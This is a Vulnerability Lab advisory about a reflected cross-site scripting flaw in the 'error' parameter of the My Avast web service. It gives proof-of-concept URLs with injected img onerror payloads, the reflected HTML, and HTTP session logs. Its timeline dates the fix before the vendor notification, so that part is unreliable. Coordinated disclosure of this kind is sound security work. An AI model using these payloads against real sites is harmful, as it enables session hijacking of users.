Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
vulnerlabKieran Claessens - [http://www.vulnerability-lab.com/show.php?user=Kieran%20Claessens]VULNERABLE:1625
HistoryApr 18, 2016 - 12:00 a.m.

AVAST (My) #15 - (frontend.exception) CS XSS Vulnerability

2016-04-1800:00:00
Kieran Claessens - [http://www.vulnerability-lab.com/show.php?user=Kieran%20Claessens]
www.vulnerability-lab.com
22
JSON
Document Title:
===============
AVAST (My) #15 - (frontend.exception) CS XSS Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1625


Release Date:
=============
2016-04-18


Vulnerability Laboratory ID (VL-ID):
====================================
1625


Common Vulnerability Scoring System:
====================================
3.3


Product & Service Introduction:
===============================
Avast security software products are developed for Microsoft Windows, Mac OS X, Android and Linux users by AVAST 
Software s.r.o., a Czech private limited company. Avast was founded in 1988, and is headquartered in Prague, Czech Republic. 
It produces antivirus and security programs for personal and commercial use. In January 2015, Avast had 21.4% of the worldwide 
security vendor market share. As of March 2015, Avast had 233 million users of its products and services worldwide. According 
to a company press release, Avast protects more than 30 percent of the consumer PCs in the world outside of China. The software 
products have a user interface available in 45 languages. Avast has 500 employees; 90 percent of whom work in the Czech Republic. 
Avast has 13 offices in Prague, Brno, Germany, China, South Korea, Taiwan & U.S.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Avast_%28software_company%29 )



Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a client-side vulnerability in the Avast Business online service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-10-27: Researcher Notification & Coordination (Kieran Claessens)
2015-10-27: Vendor Notification (AVAST Security Team)
2015-11-02: Vendor Response/Feedback (AVAST Security Team)
2015-04-12: Vendor Fix/Patch (AVAST Developer Team)
2015-04-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
AVAST!
Product: My.Avast - Online Service (Web-Application) 2015 Q4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official Avast My online service web-application.
The client-side vulnerability allows remote attacker to inject script codes to compromise client-side browser to application requests.

The vulnerability is located in the `error` value of the frontend.exception in the my avast online-service web-application. Remote attackers are 
able to inject script code to manipulate client-side GET methods request to the my.avast.com website. The injetction point is the error value of the 
exception and the execution of the injected script code occurs in the error message context. The attack vector of the vulnerability is client-side and 
the request method to inject or execute is GET.

The security risk of the client-side cross site web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. 
Exploitation of the client-side cross site scripting web vulnerability requires no privilege web application user account and low or medium user interaction. 
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load of 
malicous script codes or client-side manipulation of affected or connected modules.

Request Method(s):
				[+] GET

Vulnerable Module(s):
				[+] Avast - My

Vulnerable Parameter(s):
				[+] error

Affected Module(s):
				[+] frontend.exception - Exception Handling (Registration)


Proof of Concept (PoC):
=======================
The client-side cross site vulnerability can be exploited by remote attackers without privileged web-application user account and with low or medium user interaction. 
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Links
https://my.avast.com/en-us/error?error=registration_already_finished"><img src="X" onerror="alert('xss')>"
https://my.avast.com/en-us/error?error="><img src="X" onerror="alert('xss')>" //this gives a more detailed error.


PoC: Source
<h1>frontend.exception.header.registration_already_finished"><img src="X" onerror="alert('xss')>" <="" h1="">
<p>frontend.exception.desc.registration_already_finished"><img src="X" onerror="alert('xss')>" <="" p="">
<a href="/en-us/" class="button button-inline button-huge button-secondary margin-top-20">Go to My Avast homepage.</a>
</p></h1>


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET https://my.avast.com/en-us/error?error=registration_already_finished%22%3E%3Cimg%20src=%22X%22%20onerror=%22alert(document.cookie)%3E%22[CLIENT-SIDE SCRIPT CODE INJECT!] 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Grâße des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[my.avast.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Cookie[app_params=error%3Dregistration_already_finished%2522%253E%253Cimg%2520src%3D%2522X%2522%2520onerror%3D%2522alert%28document.cookie%29%253E%2522; 
locale2=en-ww; _ga=GA1.2.1239098146.1445943331; mySessionId=bl5aNojSS9O8NHKd]
      Connection[keep-alive]
      If-Modified-Since[Fri, 23 Oct 2015 10:52:20 GMT]
   Response Header:
      Server[nginx/1.7.6]
      Date[Tue, 27 Oct 2015 11:32:30 GMT]
      Content-Type[text/html]
      Transfer-Encoding[chunked]
      Connection[keep-alive]
      Set-Cookie[locale2=en-us; Expires=Sun, 14 Nov 2083 14:46:37 GMT; Path=/; Domain=.avast.com; Secure; HTTPOnly
mySessionId=bl5aNojSS9O8NHKd; Expires=Tue, 27 Oct 2015 11:33:30 GMT; Path=/; Domain=.my.avast.com; Secure; HTTPOnly]
      Last-Modified[Fri, 23 Oct 2015 10:52:20 GMT]
      Cache-Control[max-age=0, private]
      Strict-Transport-Security[max-age=31536000]
      x-content-type-options[nosniff]
      X-XSS-Protection[1; mode=block]
      Content-Encoding[gzip]

Status: 200[OK]
GET https://my.avast.com/en-us/X[CLIENT-SIDE SCRIPT CODE VULNERABILITY!] 
Load Flags[LOAD_NORMAL] Grâße des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[my.avast.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0]
      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://my.avast.com/en-us/error?error=registration_already_finished%22%3E%3Cimg%20src=%22X%22%20onerror=%22alert(document.cookie)%3E%22]
      Cookie[app_params=error%3Dregistration_already_finished%2522%253E%253Cimg%2520src%3D%2522X%2522%2520onerror%3D%2522alert%28document.cookie%29%253E%2522; 
locale2=en-us; _ga=GA1.2.1239098146.1445943331; mySessionId=bl5aNojSS9O8NHKd]
      Connection[keep-alive]
   Response Header:
      Server[nginx/1.7.6]
      Date[Tue, 27 Oct 2015 11:32:30 GMT]
      Content-Type[text/html]
      Transfer-Encoding[chunked]
      Connection[keep-alive]
      Set-Cookie[mySessionId=bl5aNojSS9O8NHKd; Expires=Tue, 27 Oct 2015 11:33:30 GMT; Path=/; Domain=.my.avast.com; Secure; HTTPOnly]
      Last-Modified[Fri, 23 Oct 2015 10:52:20 GMT]
      Cache-Control[max-age=0, private]
      Strict-Transport-Security[max-age=31536000]
      x-content-type-options[nosniff]
      X-XSS-Protection[1; mode=block]
      Content-Encoding[gzip]


Reference(s):
https://my.avast.com/
https://my.avast.com/en-us/
https://my.avast.com/en-us/error


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable error value in the frontend.exception module.
Restrict the input and disallow special chars to prevent client-side script code injection attacks. Sanitize the output section with the wrong set 
encoding to prevent an execution of malicious client-side script codes.

2015-04-12: Vendor Fix/Patch (AVAST Developer Team)


Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the my.avast web-application is estimated as medium. (CVSS 3.3)


Credits & Authors:
==================
Kieran Claessens - [http://www.vulnerability-lab.com/show.php?user=Kieran%20Claessens]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, 
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, 
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised 
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Contact:    [email protected] 	- [email protected] 				- [email protected]
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically 
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or 
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific 
authors or managers. To record, list, modify, use or edit our material contact (admin@ or [email protected]) to get a ask permission.

				    Copyright Β© 2016 | Vulnerability Laboratory - [Evolution Security GmbH]β„’
JSON